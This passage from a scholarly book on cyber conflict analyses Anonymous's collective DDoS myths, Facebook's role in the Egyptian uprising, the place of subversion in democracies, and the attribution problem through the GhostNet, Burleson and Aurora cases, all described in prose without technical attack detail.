tion, combined with the knowledge that many hacks and DDoS attacks 
were illegal, ultimately created distrust, paranoia, and fragility. 

The third feature is Anonymous’s myth-making. Many part-time 
participants in Anonymous’s operations share a core tenet: the belief in 
the power of the collective, the “hive mind” or just “the hive.” This 
vision of the collective is an old and appealing one. Anonymous’s parti¬ 
cipants see themselves as a veritable popular force, as the masses of the 
web, a powerful sum of elements that would be weaker individually. 
Plus anonymity seemed to be the ultimate form of egalitarianism: eve¬ 
rybody could be anybody, without hierarchy, without titles or degrees. 
The epitome of the hive was a voluntary Denial of Service Attack, with 
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thousands of individuals joining a Twitter-coordinated collective attack 
against unsuspecting targets. To stimulate the hive mind, the virtual 
“weapons” would have fancy names like Warbot, Russkill, Good Bye 
v3.0, or—to name an initially popular tool—the Low Orbit Ion Can¬ 
non, the LOIC. 51 The problem was: hive-distributed denial of service 
attacks were far less effective than many assumed. The collective DDoS 
attack on PayPal.com on 8 December 2010 illustrates this. On that day 
about 4,500 participants who had downloaded the LOIC and set it on 
the “hive option” joined the collective to take down the payment service 
provider who had been critical of WikiLeaks. But when Twitter and 
4chan exploded with excited posts of “*FIRE FIRE FIRE FIRE*,” 
nothing happened. Only when one botnet operator joined the attack by 
commandeering more than 30,000 zombie computers to contribute did 
PayPal’s website go down. The legitimate owners of these many thou¬ 
sands of hijacked computers did of course not know that the temporary 
slowdown of their Internet connection meant they were participating in 
an attack on PayPal. 52 The Anonymous hive, likewise, did not know that 
one single botnet operator outgunned them nearly ten-to-one. Remar¬ 
kably, a tiny elite of Anonymous hackers did not want to discourage the 
collective by mentioning the botnets. The myth of the hive may be 
misleading, but it is also very powerful. It kept morale high—but it also 
ensured that there was fluctuation among the participants. “What sets 
Anonymous apart is its fluid membership and organic political evolu¬ 
tion,” wrote Gabriella Coleman, an anthropologist who has tracked the 
Anonymous phenomenon for many years. The movement has neither a 
strategy nor structures in place that could set a strategy. It is tactically 
driven. “Anonymous has no consistent philosophy or political program,” 
Coleman observed. 53 This observation leads to the final thesis. 

The third hypothesis follows from the preceding theoretical and empi¬ 
rical observations on subversion: the more a subversive movement relies 
on new technologies and networked communications, the more difficult 
it will be to establish an internal coercive order. An internal coercive 
order must not always express itself in actual acts of punishment, as the 
chapter on violence explored in some detail. But the knowledge of such 
an enforced order is what endows rules and guidelines of behavior with 
authority—it is this internal order that differentiates a movement from a 
group. Enforced orders also enable strategic decisions by preventing ran¬ 
dom membership mobility and thus facilitating a coherent purpose that 
may overcome a movements cause-driven character. 
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For any subversive movement, there are two principal sources of 
cohesion, an internal coercive order or external coercion. An extreme 
example of the former, internal enforcement, is a drug cartel or a mafia 
organization: even if a disillusioned member decides to leave his or her 
group by cooperating with law enforcement, they would still have to 
fear the group’s punishment—that punishment is an expression of the 
group’s ability to maintain an internal coercive order. The other source 
of cohesion, paradoxically, is the strength of the established system that 
a subversive movement is up against. But as soon as the despised coer¬ 
cive order collapses, the frail unity of a web-enabled movement is likely 
to collapse as well. Online subversion may facilitate the goal of collecti¬ 
vely undermining trust in an established order, but it may also obstruct 
the broader aim of collectively establishing trust in the new order that is 
to be put in its place. 

Powerful examples can be found in the way the Arab Spring of 2011 
was triggered. Initially the Arab youth movements that shattered the 
established order in Tunisia, Egypt, Libya, Yemen, and elsewhere had a 
strong web presence on social media platforms. One example from 
Egypt, the second country to revolt against its old regime, is instructive. 
Wael Ghonim, an Egyptian Google marketing executive who was based 
in Dubai at the time, offered an inside view of one of the Facebook 
groups that helped trigger the revolution of 25 January 2011 in an auto¬ 
biographical book, Revolution 2.0 . 54 Ghonim had been the administra¬ 
tor of Kullena Khaled Said, a Facebook group that formed spontaneously 
in order to protest against the fatal beating of a young Egyptian man at 
the hands of the secret police. In the early subversive stages of what 
would later become a revolution, Internet forums, but mostly Facebook 
and to a lesser extent Twitter, helped coordinate small activities, such as 
a human chain along the corniche in Alexandria and “silent stands” of 
protestors, dressed in black. The social network offered a platform for 
planning as well as after-action-deliberation. Some posts later received 
thousands of “likes” and comments, and hundreds of thousands read the 
messages. 55 But most importantly, Facebook helped middle-class Egyp¬ 
tians understand that they were not alone in their frustration, and that 
there was a real potential to stage protests that were too large for the 
government to suppress by force. The majority of Egyptian Facebook 
users joined the online protest under their real names, by becoming a 
“member” of a specific Facebook group, by “liking” that group’s status 
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update, or by writing a short comment—such small expressions of soli¬ 
darity were not enough to jolt the security forces into action (if they 
even noticed). 

But such small expressions of solidarity were enough to begin under¬ 
mining the trust that many if not most Egyptians had in the efficiency 
of the secret police, the confidence they had in the efficiency of the 
state’s coercive order—or, put inversely, it increased the prospective pro¬ 
testers’ confidence in the uprising. The Facebook coordination combi¬ 
ned a potent mix of anonymity and real names: the moderators of 
various Facebook groups that helped spark the unrest remained anony¬ 
mous, trying to evade the prying eyes of the state’s security forces, but 
the mass of those who “liked” the posts and commented were not ano¬ 
nymous. Real names lent a reality and urgency to the phenomenon that 
would have been difficult to achieve anonymously. On 25 January, 
protesters had planned to take to the streets and to Tahrir Square for the 
first time in very large numbers. Going to that preannounced demons¬ 
tration meant taking considerable personal risk. The authoritarian 
regime would not stand idly by, and had mobilized large numbers of 
security forces. The hope of the Facebook-organized protest movement 
was to overwhelm the police and thugs hired by the regime with even 
larger numbers of peaceful protesters. Individuals, if they turned out in 
numbers that were large enough, would be protected by the sheer mass 
of the demonstration. 

But the step from online to offline protest had momentous conse¬ 
quences. Once the initial spark started a larger political movement, street 
protests gained a revolutionary dynamic that could not be stopped, nei¬ 
ther by Hosni Mubarak’s clumsy shutdown of the Internet in Egypt nor 
by the brutality of the state’s security forces. This remarkably fast initial 
mass-mobilization seemed possible only through online social networks 
by savvy individuals like Ghonim. But until the very last moment on 25 
January, even Ghonim and the other organizers did not know if their 
work would create the turnout they had hoped for: “We could not 
believe our eyes,” he wrote afterwards, recalling his surprised arrival at the 
main protest site. “I began tweeting like a madman on my personal 
account, urging everyone to come out and join the protest.” 56 But by 
then it was probably already too late for tweets: once the uprising had 
manifested itself in the street, the significance of social media instantly 
diminished. Facebook proved highly efficient in undermining the trust 
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in the states monopoly of force and the regime’s ability to crush the 
protests; but the web had little to offer after that was accomplished. Buil¬ 
ding trust in new political institutions is an entirely different matter. 

This chapter has argued that subversion is a useful concept to unders¬ 
tand the potential and limits of activism in cyberspace—it is an old idea 
that manages to overcome the debate’s focus on violent methods and 
opens the comparison to resistance movements with limited, non-revo¬ 
lutionary goals. These shifts in perspective help to understand how new 
technologies are changing subversive activism . 57 Three hypotheses were 
introduced to capture that change: that subversion has become more 
cause-driven; that subversion is characterized by higher levels of mem¬ 
bership-mobility; and that subversive movements find it more difficult 
to exert organizational control by erecting an internal enforced order. If 
these conclusions are accurate, cynics may conclude, then “cyber subver¬ 
sion” does not represent a formidable and perhaps even existential chal¬ 
lenge to modem, liberal democracies. Such a conclusion would be naive 
and short-sighted. But the real challenge will come as a surprise to 
many: the challenge is not effectively stamping out subversion; the chal¬ 
lenge is finding the right balance that maintains the fragile and hard-to- 
achieve degree of healthy subversion that characterizes the most 
successful liberal democracies and the most successful economies. 

Subversion, in contrast to what some security scholars seem to think, 
is not principally illegal and it is not even principally illegitimate—only 
the most extreme forms of subversion are. The above examples were 
such moderate forms, and they were deliberately chosen for that reason. 
Understanding subversion’s extreme form requires understanding its 
moderate relatives first. Ideas and activities acquire subversive character 
not through inciting violence while remaining non-violent, but when 
these activities undermine and erode established authority. This thought 
immediately leads to a conclusion that is as surprising as it may be 
discomforting for most students of political violence: subversion may 
not just remain entirely non-violent; it may remain entirely within the 
boundaries of the law, especially in free and open democracies. In sharp 
contrast to Kitson’s ideas, neither non-violence nor illegality can suc¬ 
cessfully delineate subversive activity in its earliest stages. More in line 
with Agnoli’s ideas, subversive thought is not necessarily radical or 
militant, but it is almost always political and often embraces progress. 
Put differently, democracies are political systems designed to accommo- 
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Figure 2: schematic graph of four types of subversion. 


date a certain amount of subversive activity—if warranted even by 
changing its legal and possibly its constitutional foundation. Subversion 
therefore spans the philosophical and the practical; the legal and the 
illegal; the non-violent and the violent; and the non-revolutionary and 
the revolutionary. Most importantly, it can be regenerative or it can be 
degenerative. 

In any democratic political system, some degree of subversive activity 
is a necessary precondition of a free, open, and critical polity. The side 
effect must not be undesirable let alone destructive; subversion may be 
a constructive social force that is highly desirable from a systemic point 
of view. Productively challenging established authority helps bring about 
a dynamic, adaptive, and innovative culture—in business, scholarship, 
and politics. Some of the demands of students and protesters in the 
1960s and 1970s, such as the end of racial discrimination, or later the 
promotion of gay rights, were subversive at the time in the United States 
and Western Europe, but were broadly accepted across the political spec¬ 
trum a few decades later. It is a mainstay of capitalism that even esta¬ 
blished market leaders should be constantly challenged to stay innovative 
and drive competition. As soon as a firmly established authority, be it 
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political or economic, is shielded from all criticism and challenges, it is 
likely to become stale, inert, and complacent. 

This raises a more elementary issue: the question of when subversion 
flips. When and how subversion flips from the regenerative and legiti¬ 
mate expression and the articulation of dissent to regression, illegality, 
and violence—or indeed the other way round. In any democratic state, 
the boundary between what is considered legal and what is considered 
illegal is always the outcome of ongoing political debates that shape a 
state’s legislative measures and its laws. The line between regenerative 
and degenerative subversion is forever blurred and the subject of fierce 
disputes on both ends of any society’s political and cultural spectrum. 
Here time is of the essence. Subversive movements, for instance the 
anti-globalization movement or the “Occupy” phenomenon, may 
appear limited, isolated, extreme, or inconsequential, especially to 
conservative observers in the context of their time. But perspectives and 
interpretations may change slowly and imperceptibly over time. The 
conclusion is that it is difficult to assess subversion as it happens; some 
historical shifts are hard to spot in real time. 58 Yet one historical trend is 
clear: in liberal democracies, subversion has been successfully legalized 
and institutionalized. 59 Three examples serve to make this point. 

Subversion has been institutionalized in academia. Scientific progress 
itself relies on periodically overthrowing established knowledge in scien¬ 
tific revolutions, so-called “paradigm shifts,” as the historian of science 
Thomas Kuhn famously outlined. 60 In some disciplines scholarly prac¬ 
tice did not remain implicitly subversive, but turned explicit. As post¬ 
modernism rose to prominence in the 1980s and 1990s, it became 
possible for scholars who crafted subversive theories to make a career in 
the establishment of philosophy, sociology, and adjacent disciplines, 
and, rather ironically, to become part of an increasingly dominant order 
in their own right. By the early 2000s, for instance, the language of 
subversion had become so common in cultural studies that scholars 
began avoiding verbs like “undermine,” “erode,” and “deconstruct” 
because in the wider field of cultural studies these phrases had been 
overused and had become stale. 61 Writing too subversively could narrow 
a funding proposal’s chances for success—not because the proposed 
ideas were running the risk of being too radical, but of being too bland. 

Subversion has also been institutionalized in literature and art. In a 
much-noted 1981 study, Fantasy: The Literature of Subversion, Rosemary 
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Jackson highlighted the critical and subversive potential of fantastic 
literature. The fantastic, as Jackson saw it, may trace the unsaid and the 
unseen of a society’s cultural and political established order, that which 
has been silenced, concealed, and covered. Telling a story within the 
bounds of the rational and the accepted would imply using the language 
of the dominant order, thus accepting its norms and contributing to 
keeping the “dark areas” covered by the dominant discourse. Literature 
and art, not just of the fantastic kind, often playfully explore the limits 
of the established. Irene Rima Makaryk’s Encyclopedia of Contemporary 
Literary Theory has a two-page entry for Subversion. The encyclopedia 
understands subversion as an articulation, as the ‘“becoming visible’ of 
any repressed, forbidden, or oppositional interpretation of the social 
order.” 62 Cultural critics and literary scholars are fond of quoting the 
controversial German philosopher and philologist Friedrich Nietzsche, 
whose writings inspired a great deal of critical philosophical and political 
thought in the twentieth century. “So what is truth?” asked Nietzsche, 
and then responds forcefully, 

A moving army of metaphors, metonymies and anthropomorphisms, in 
short a summa of human relationships that were poetically and rhetori¬ 
cally exaggerated, transposed, and beautified until, after long and repeated 
use, a community considers them as solid, canonical, and binding. Truths 
are illusions whose illusionary nature has been forgotten; metaphors that 
have been used up and have lost their imprint; coins that have lost their 
image and that are now appear as mere metal, no longer as coins. 63 

For Paul De Man, a founding figure in literary theory, Nietzsche’s 
passage stands for “the necessary subversion of truth.” 64 

Perhaps most importantly, subversion is institutionalized in liberal 
constitutional orders. An impressive example is the well-known right to 
resistance enshrined in some liberal constitutions. In 1968, Germany 
added article 20, paragraph 4, to its basic law, or Grundgesetz. The clause 
states that the Federal Republic of Germany is a democratic and social 
state, that all power is ultimately in the hands of the people, and that the 
constitutional legal coercive order, the executive branch, and law enfor¬ 
cement are bound by the law. The basic law then adds, “All Germans 
have the right to resist anybody who attempts to remove this order, if no 
other courses of action are available.” 65 This right to resistance was desi¬ 
gned as a safeguard against an abuse of power at the hands of the 
government and its law-enforcement agencies. The law is informed by 
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the idea that, during a state of exception ( Notstand ), the State itself may 
undermine the constitutional order. The king can do wrong. In times of 
perceived constitutional peril, governments with an authoritarian bent 
react with crackdowns, censorship, or emergency laws to mounting 
dissent. Authoritarian regimes see the rise of Internet-fueled subversion 
as such a dangerous trend that it needs to be met with aggressive coun¬ 
termeasures. For liberal democracies, the problem is far more delicate: 
they need to find out how to rebalance the right to resistance and civil 
liberties with national security. By overshooting the target in a new and 
confusing digital environment, liberal states may inadvertently push 
previously legitimate civic action into the realm of illegal subversion. 
“The restoration of the old order constitutes a permanent risk,” Johannes 
Agnoli told his students in Berlin on 31 October 1989, just days before 
the Berlin Wall fell. The old Marxist closed his lecture that Tuesday by 
warning of unknown innovations that would again and again tempt 
those in power: therefore “the theoretical and practical work of subver¬ 
sion will never be finished.” 66 
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There is perhaps no better example of the retreat of violence through 
cyber attacks than the attribution problem. To understand why, some 
background is needed. Conflict, like so many other human interactions, 
occurs online where possible. The resulting changes, this book has 
argued, are mostly overestimated in their breadth and depth and in their 
overall significance. But that does not mean that no fundamentals of 
human conflict are being altered. Nearly all political cyber attacks on the 
empirical record—whether they were done for purposes of espionage, 
sabotage, or subversion—have one feature in common, as the cases dis¬ 
cussed in this book illustrate. That feature of digital conflict represents 
a fundamental, and in many ways disturbing, change when compared 
to political confrontations in earlier, analogue times, be they violent or 
non-violent: that change is the attribution problem. 

Mike McConnell was director of the National Security Agency from 
1992 to 1996 and later George W. Bush’s director of National Intelli¬ 
gence until 2009. About a year later, in February 2010, he gave an inter¬ 
view to The Washington Post. Admiral McConnell portrayed the lack of 
traceability as a grave problem for US foreign policy and demanded far- 
reaching action. It is worth quoting Americas former top-spy at length: 

We need to develop an early-warning system to monitor cyberspace, iden¬ 
tify intrusions and locate the source of attacks with a trail of evidence that 
can support diplomatic, military and legal options—and we must be able 
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to do this in milliseconds. More specifically, we need to reengineer the 
Internet to make attribution, geolocation, intelligence analysis and impact 
assessment—who did it, from where, why and what was the result—more 
manageable. 1 

Two-and-a-half years later, on 11 October 2012, Leon Panetta gave a 
much-noted speech to business leaders at the Intrepid Sea, Air and 
Space Museum. The venue had a powerful subtext: the museum is on a 
decommissioned Essex -class aircraft carrier, the USS Intrepid, today floa¬ 
ting off a pier in the Hudson River in New York City. The Second 
World War-tested Intrepid sports a number of high-powered military 
airplanes on deck, most prominently an early model of a SR-71 “Black¬ 
bird,” an advanced strategic spy plane that holds several speed and high- 
altitude records. That Thursday in New York, The US Secretary of 
Defense also a former director of the CIA, was uniquely well placed and 
well qualified to talk about a novel threat facing the nation, cyber attack. 
“The department,” Panetta continued, “has made significant advances in 
solving a problem that makes deterring cyber adversaries more complex: 
the difficulty of identifying the origins of an attack.” This statement was 
a historic first. Technicians and computer scientists say that a clever 
attacker can successfully avoid identification. Indeed, the US govern¬ 
ment itself had just done so with several high-profile attacks under the 
code-name Olympic Games. But the secretary’s speech that day painted 
a very different picture: 

Over the last two years, the department has made significant investments 
in forensics to address this problem of attribution, and we are seeing 
returns on those investments. Potential aggressors should be aware that the 
United States has the capacity to locate them and hold them accountable 
for actions that harm America or its interests. 2 

The secretary’s rhetoric included a measure of bluff and bluster, but 
how much is difficult to gauge. Assessing the potential countermeasures 
that McConnell and Panetta ominously referred to first requires unders¬ 
tanding the problem at hand. That problem is simple: under what 
conditions can a cyber attack be attributed to an agent? Are there any 
trends and possible changes that may affect the attribution problem by 
making it easier or more difficult to solve? The answer to this simple 
question is complicated and surprising. 

This chapter argues that the attribution problem, at its core, is a poli¬ 
tical problem more than it is a technical problem. “Reengineering” the 
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Internet, as McConnell suggested, is not only unrealistic, it would not 
even solve the problem at hand. 3 There is no purely technical solution 
to the conundrum of attribution, and this is highly unlikely to change. 
The attribution problem has a territorial dimension, and therefore turns 
into a political problem. In the vast majority of cases of international 
political cyber attacks, especially when they are professionally executed, 
the attribution problem therefore cannot be solved—unless the political 
stakes are high enough. This leads to a counterintuitive insight: the attri¬ 
bution problem is a function of an attack’s severity. The following pages 
make clear why. 

The argument will be established in four quick steps, each of which is 
illustrated by at least one representative example. This chapter first puts 
the attribution problem in the appropriate context; it then distinguishes 
three layers of the attribution problem; the difficulties of attribution 
under near-optimal conditions will then be discussed; and finally the 
offender’s perspective on the attribution problem will be considered. 

The attribution problem is not new in itself. Punishing an offender, 
or threatening to do so, requires identifying that offender. The problem 
is well known in criminal justice. Once a criminal offense has been 
committed, the prosecution has to find a suspect, possibly arrest her, 
establish acceptable criminal evidence, and ultimately sentence the cri¬ 
minal to be punished. The attribution problem is less well explored in 
international relations, where conventional state-on-state offenses 
mostly left little doubt about the attacker’s identity. Even in the case of 
surprise attacks, the prized questions were usually when and from where 
the attack was coming, not from whom. Military history knows no 
major battles where the enemies did not reveal themselves. In the 
context of the conventional use of armed force, the attribution problem 
arises in two principal situations. One is the use of covert operations. 
The United States, for instance, tried to hide its hand in the support of 
the Afghan mujahedeen in the 1980s. Iran has been trying to conceal its 
support for Hezbollah. Examples of covert operations abound, especially 
in the context of proxy conflicts where third parties intervene. The other 
principal situation is political violence and terrorism. Individual attacks 
cannot always be easily and immediately attributed to one specific mili¬ 
tant group or actor when no group claims credit in a credible way. Two 
prominent examples are the 1988 attack on Pan Am Flight 103 (the 
Lockerbie bombing) and the 1995 Oklahoma City bombing, where 
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Timothy McVeigh tried to hide his role. Yet in the vast majority of cases 
perpetrators do claim credit, especially when the attack was a lethal and 
spectacular one. 4 Both the history of covert operations and the history 
of terrorism know attacks where no enemies revealed themselves, and 
where none could be clearly identified in hindsight. Yet such cases are 
rare. 5 When hard weapons are used, non-attribution is the exception, 
not the rule—when malicious software is used, non-attribution is the 
rule, not the exception. This important contrast makes clear that cyber 
attacks are especially well suited for two activities that have always 
tended towards the shadows, crime and espionage. 

The so-called GhostNet incident ideally illustrates the attribution 
problem in the context of a complex cyber espionage operation. In 
2008, the Dalai Lama suspected that his staff was being spied on. The 
spiritual leader had to flee Tibet in 1959. Lor the past half-century he 
has lived and worked in exile in India. The Dalai Lama has often crossed 
the Chinese government, diplomatically as well as with wider publicity 
campaigns. In the 1990s, the spiritual leader started to make use of the 
web to publish talks and speeches and later to reach out to potential 
supporters. But over time, the web also offered his enemies a way to 
strike back. Early in 2008, the Tibetan leader’s office invited two experts 
to help examine their computers in Dharamsala in a thorough forensic 
investigation. Two researchers came, Greg Walton from the Citizen Lab, 
a group of information security researchers at the Munk Center for 
International Studies at the University of Toronto in Canada, and 
Shishir Nagaraja, a computer scientist of Indian origin working with the 
University of Cambridge. They found that the holy Tibetan leader was 
indeed under attack. Ron Deibert, head of the Citizen Lab, who broke 
the story in March 2009, called it GhostNet. GhostNet was indeed a 
sophisticated international spying operation, probably of Chinese ori¬ 
gin. In less than two years, the shadowy network had infected 1,295 
host computers in embassies, international organizations, news media, 
and NGOs in 103 countries, and ministries of foreign affairs were also 
affected, including the foreign offices of Iran, Bangladesh, Latvia, 
Indonesia, the Philippines, Brunei, Barbados, and Bhutan. The Dalai 
Lama’s offices in India, Brussels, London, and New York were also infec¬ 
ted with the clandestine spying software. The cyber espionage operation 
uncovered by the visiting academics turned out to be the largest of its 
kind ever uncovered, at least in terms of the countries affected by the 
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threat. The malware was able to take full control of infected computers, 
including searching and downloading documents, logging keystrokes, 
and even covertly activating PC cameras and microphones and captu¬ 
ring the recorded information. 6 

The attack had two vectors. Like many targeted attacks, it employed 
social engineering, in the form of “spear phishing,” to lure unsuspecting 
victims to open email attachments. One email, for instance, sent on 25 
July 2008, pretended to come from campaigns@freetibet.org and alle¬ 
gedly contained the translation of a “freedom movement ID book” in 
the form of an attached .DOC file. If the user opened the attachment, 
the malicious file would exploit a vulnerability in Microsoft Word and 
install the espionage malware on the user’s computer. 7 Some malicious 
emails allegedly came from monks or other Tibetan co-workers, thus 
making them more trustworthy. Even worse, the attackers also stole 
some emails in transit and replaced legitimate attachments with infected 
files. 8 The other way attackers would gain entry into a targeted system 
was by getting the user to visit a website that contained malware which 
was then downloaded. Infected computers would routinely get in touch 
with a command-and-control server and possibly receive instructions for 
the next step, such as installing a remote access tool. 

Technically, the operation relied mainly on backdoors, more precisely 
a Remote Access Trojan (RAT), especially a modified version of a tool 
called Poison Ivy or GhOst RAT (spelled with a zero, not the letter “o”), 
hence the name GhostNet. Once the GhOst RAT was installed on a 
targeted machine, the infected computer would periodically try to 
connect to a specific IP address, and as soon as the attackers had fired up 
the remote access Trojan on the infected machine they would be able to 
use a wide range of commands, including using the file manager, taking 
screen shots, logging keystrokes, using the computer’s webcam, and the 
built-in microphone. The attackers were also able to execute programs 
on infected machines. This was supposed to happen clandestinely. But 
one monk reportedly happened to look at his screen when Outlook 
Express fired up on its own and started sending emails to his contacts 
with toxic documents attached. 9 

Such remote administration tools are openly available on the Internet, 
maintained as openly available backdoors by loosely organized hackers. 
One such hacker group, Wolfexp, even made videos available in Chinese 
on how to use their tool to take over targeted machines remotely, com- 
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plete with grainy screenshots of unsuspecting web users to illustrate the 
potency of their spying program. 10 This means that the tools to execute 
GhostNet were openly available as well as relatively easy to use. The 
social engineering part of the attack was sophisticated, but the operation, 
in contrast to more tailored and more complex attacks such as Stuxnet 
or Plame, most likely did not require the intelligence, the resources, or 
the skills that only a nation-state could muster. This raises the question 
of attribution. The highly detailed Canadian report pointed out that the 
targets reflected China’s security priorities, especially Tibet and Taiwan. 
And the IP addresses that were used to launch the attack were located on 
Hainan, an island in the South China Sea with a population of about 8 
million people and home to a large signals intelligence base, just west of 
Lingshui Air Base. One of the main tasks of this intelligence base is 
monitoring satellite communication. Lingshui is one of Asia’s most 
important intelligence bases and it reportedly houses more than 1,000 
intelligence analysts working for the PLA’s much larger Third Technical 
Department based near Beijing. Deibert’s team was careful not to point 
the finger directly at the Chinese government because the uncovered 
evidence was inconclusive: “we do not know the motivation or the iden¬ 
tity of the attacker(s),” the highly detailed and thorough Canadian report 
said. 11 The authors of the much shorter University of Cambridge report 
were less careful in their wording: “it was a targeted surveillance attack 
designed to collect actionable intelligence for use by the police and secu¬ 
rity services of a repressive state, with potentially fatal consequences,” 
they wrote. 12 Despite all this technical evidence, it remains unclear if the 
Chinese government, intelligence agencies, or the military were directly 
responsible for the operation. China’s government denied the accusa¬ 
tions through its embassy in London. 

Attribution, in the context of computer attacks, has several layers. The 
first layer is technical. The Internet is a so-called packet-switched 
network. A packet is a slice of a larger piece of information, for instance 
an email, a website, a Word document, or a piece of malware. 13 Finding 
malicious packets or malicious functionality is a forensic problem. The 
forensic goal, in starkly simplified terms, is to trace malicious activity to 
an IP address. The second layer is social. The difficulty is connecting a 
machine to a human user. If an individual used an open WiFi network, 
stole a computer including its Internet connection, or never left any 
traces that personally and geographically would identify the user’s iden- 
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tity, the second layer is very hard, if not impossible, to penetrate. The 
third layer is political. If the Internet was confined to a territory where 
one entity has a monopoly of force, the attribution problem could be 
solved much more easily. 14 Suppose online fraud at a London bank was 
committed from a specific IP address, say 80.4.248.191, on 5 Septem¬ 
ber at 21:09. Scotland Yard would then be able, through a simple 
WHOIS lookup, to trace the IP address to a postal address registered in 
Bartley Wood Business Park in Hampshire in the United Kingdom, the 
registered address of Virgin Media Ltd, one of Britain’s leading ISPs. 15 
The London police authorities could request, and possibly subpoena, 
Virgin Media to reveal information from its log files to identify which 
of the ISP’s individual customers had used that particular address on 5 
September at quarter past nine. Virgin is required by English law to 
keep this data. The police could then simply knock at the suspect’s door 
and confiscate his computer. But reality often works differently. 16 The 
lookup of a fraudulent transaction on 5 September at 21:09 may lead to 
217.66.19.45, with an unidentified host and an unidentified owner in 
the Russian Federation. The London police could then request authori¬ 
ties in Russia to investigate—if the Russian authorities cooperate, if they 
identify the ISP correctly, and if the ISP provides the log files, they may 
find the relevant traffic was encrypted and routed through yet another 
country that may or may not cooperate. And so on. Already this over¬ 
simplified example shows that what appears to be a technological pro¬ 
blem soon morphs into a political one, creating conditions that require 
foreign authorities to cooperate swiftly before logs are lost, if ISPs keep 
log files at all, which they may not be legally required or willing to do. 
Needless to say, in the case of political cyber attacks, especially economic 
espionage, some foreign political authorities may have no interest in 
cooperating at all. The more clearly an attack is of a purely for-profit 
criminal nature, the less political the attribution problem will become, 
and continued investigation will depend more on the criminal justice 
system of a particular country. 

But even in real-life criminal cases, the technical picture is far more 
complex. Richard Clayton of Cambridge University prepared one of the 
most detailed and comprehensive studies on attribution, although he 
rarely used the term in the report. His analysis focuses on “traceability” 
on the Internet. Anonymity is present when traceability fails, in Clay¬ 
ton’s words. 17 The computer scientist discussed traceability in four sim- 
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plified steps: determining the IP address that is to be traced; establishing 
the Internet Service Provider, which could be an independent non-com¬ 
mercial entity like a government or university; identifying the user 
account in the ISP’s records; and finally connecting the actual identity 
of the responsible individual that operated a specific account at a specific 
time. On each step along the way of traceability, there can be obstacles 
that are impossible to overcome. As the Internet became more complex 
and dynamic at the turn of the millennium, the possibilities for obscu¬ 
ring traceability increased, even on a purely technical level. Clayton 
concluded that the future will bring even more uncertainty. “Quite 
clearly there will be many more examples of traceability problems to 
understand, explain and perhaps even fix.” In addition, the presently 
used techniques are already less reliable than often assumed. “Par too 
many of the systems that underpin traceability are far less accurate than 
anyone really imagines,” Clayton wrote, adding a warning: 

There is a real risk of significant miscarriages of justice should traceability 
start being seen as “evidence” rather than “intelligence” and it is vital to 
educate Law Enforcement and Governments on the limitations of tracea¬ 
bility—whilst still accepting that a great deal of the time it is perfectly 
possible to work out “who did that” and smash down the right door. 18 

Looking at a simple historical case where these technical complexities 
do not apply brings the basic features of attribution into relief. Even in 
the best-documented court cases where a criminal made mistakes, moti¬ 
vations are known, and detailed supporting evidence is available, attri¬ 
bution may still not be a certainty. This is ideally illustrated by the 
Burleson case, the very first felony conviction for the malicious use of 
software in American history. It played out in 1985, and it did not 
involve any remote network intrusion. The software systems at the time 
were much simpler—the malware in question was developed for an 
IBM System/38, a server platform at least as big as two washing 
machines, which was commercially available as early as 1979. The 
machine had a working memory of 1MB, 1,000 times less than the 
working memory of a 2012 iPhone. Prom a purely technical point of 
view, the case was therefore vastly simplified. 

On the morning of 21 September 1985, a programmer came into the 
offices of the Port Worth, Texas, offices of the United Services Planning 
Association and its subsidiary, the Independent Research Agency for Life 
Insurance. The company and its 450 agents sold insurance to US mili- 
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tary personnel. 19 The programmer had come to run tests on a new bonus 
system. As he tried to run simulations on the payroll file, the results 
repeatedly came up with zeros. It turned out that 168,000 commissions’ 
payroll records had been deleted. The monthly volume of those payrolls 
averaged $2 million. A log file from 21 September 1985 showed that a 
terminal had been fired up at 03:03 in the morning. Somebody had 
physically broken into the offices and caused the damage. The sub¬ 
sequent forensic investigation found that a sequence of malicious scripts 
had been implanted into the IBM system three weeks before that break- 
in. A forensic analysis found that an employee with privileged access had 
rigged the system over Labor Day, 2 September 1985. That employee 
allegedly wrote a number of scripts that would be clandestinely inserted 
into a legitimate program that ran a routine every day. One of the 
malware’s modules, ARF-1, checked the timestamp every time the legi¬ 
timate program was running. When the date matched, ARF-1 triggered 
a series of other scripts that then resulted in overwriting the commis¬ 
sions’ payroll records. Among forensic experts, the case is also known as 
one of the first documented “logic bombs.” 20 

The main suspect was Donald Gene Burleson, known as a quarrel¬ 
some and unpleasant colleague. The forty-year-old programmer had 
been fired just two days before the break-in. So Burleson had the motive 
and the means to commit the crime. Yet there were other suspects. The 
evidence in the monumental trial was not conclusive, and the jurors 
were in doubt and ready to acquit the defendant. Then, however, Burle¬ 
son made the mistake of trying to come up with an alibi, which blew up 
in his face. After the jury returned to the courtroom with the guilty 
verdict, one juror reportedly told another, “If Burleson had just said he 
couldn’t remember where he was that day, I would have voted for him. 
The state really didn’t prove anything. But why did he have to lie?” 21 The 
trial concluded on 19 September 1988. It was the first case in American 
history in which the defendant was charged with the malicious destruc¬ 
tion of files. “As far as I know, it’s the first case of this type in the nation,” 
explained Tarrant County Assistant District Attorney Davis McCown at 
the time. “We’ve had people stealing through computers, but not this.” 22 
McCown had spent almost three years on the case. In the end, Burleson 
did not have to go to prison; he received seven years on probation and 
had to pay $11,800 in restitution to the USPA. Burleson was convicted 
not under a federal law, but under the Texas Penal Code, section 33.03, 
act of 14 June 1985. 
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Another, vastly different malware incident complements the Burleson 
case, and enables an insightful comparison between a well-documented 
domestic case and a well-documented international case. On 12 January 
2010, Google disclosed in a post on its corporate blog that it had 
become the subject of a sophisticated cyber attack. “In mid-December, 
we detected a highly sophisticated and targeted attack on our corporate 
infrastructure originating from China that resulted in the theft of intel¬ 
lectual property from Google,” the company announced. 23 Initially 
Google engineers had suspected an individual security incident, albeit 
an especially sophisticated one. But during an investigation they disco¬ 
vered that the attack was “something quite different.” Google announced 
that two email accounts of Chinese human rights activists had been 
hacked, not by stealing the login credentials from the user, but by pene¬ 
trating Google itself. It also became evident that intellectual property 
was stolen. 

The hack followed a by now familiar pattern, first a specific Google 
employee would be identified. Then that user would receive an email 
from a trusted source with a link. When the unsuspecting employee 
followed that link, he or she would be directed to a website hosted in 
Taiwan. This site contained malicious JavaScript code. If the Google 
employee was using Internet Explorer, the site would exploit a zero-day 
vulnerability to inject the payload in the form of a binary file disguised 
as an image. Next the malicious code would open a backdoor and set up 
a hidden communication to command-and-control servers in Taiwan. 
Only then did the attackers play their trump card. The Aurora hackers 
had devised a method to gain access to Google’s software configuration 
management system (SCM), in this case an installation of Perforce, a 
platform widely used by large software developing companies. Vulnera¬ 
bilities in such source code management systems were not widely known 
